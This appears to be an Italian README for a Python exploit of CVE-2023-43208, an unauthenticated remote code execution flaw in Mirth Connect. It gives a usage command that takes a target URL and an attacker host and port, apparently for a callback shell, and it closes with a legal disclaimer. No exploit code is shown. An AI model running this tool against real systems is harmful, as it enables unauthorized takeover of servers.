
Implementazione in Python di CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
Questo exploit sfrutta una critica vulnerabilità di deserializzazione nel motore XStream di Mirth Connect. Deriva da una patch incompleta per CVE-2023-37679, consentendo l'esecuzione arbitraria di codice non autenticata su tutte le versioni precedenti alla 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Questo script di exploit è destinato esclusivamente a scopi educativi e ad audit di sicurezza autorizzati per assistere i difensori nella mitigazione di CVE-2023-43208; qualsiasi utilizzo di questo strumento contro target non autorizzati è illegale e di esclusiva responsabilità dell'utente finale. L'autore fornisce questo software "così com'è" senza alcuna garanzia, declina ogni responsabilità per potenziali usi impropri o danni e non approva né incoraggia attività non autorizzate. Utilizzare a proprio rischio e solo in conformità con le leggi applicabili.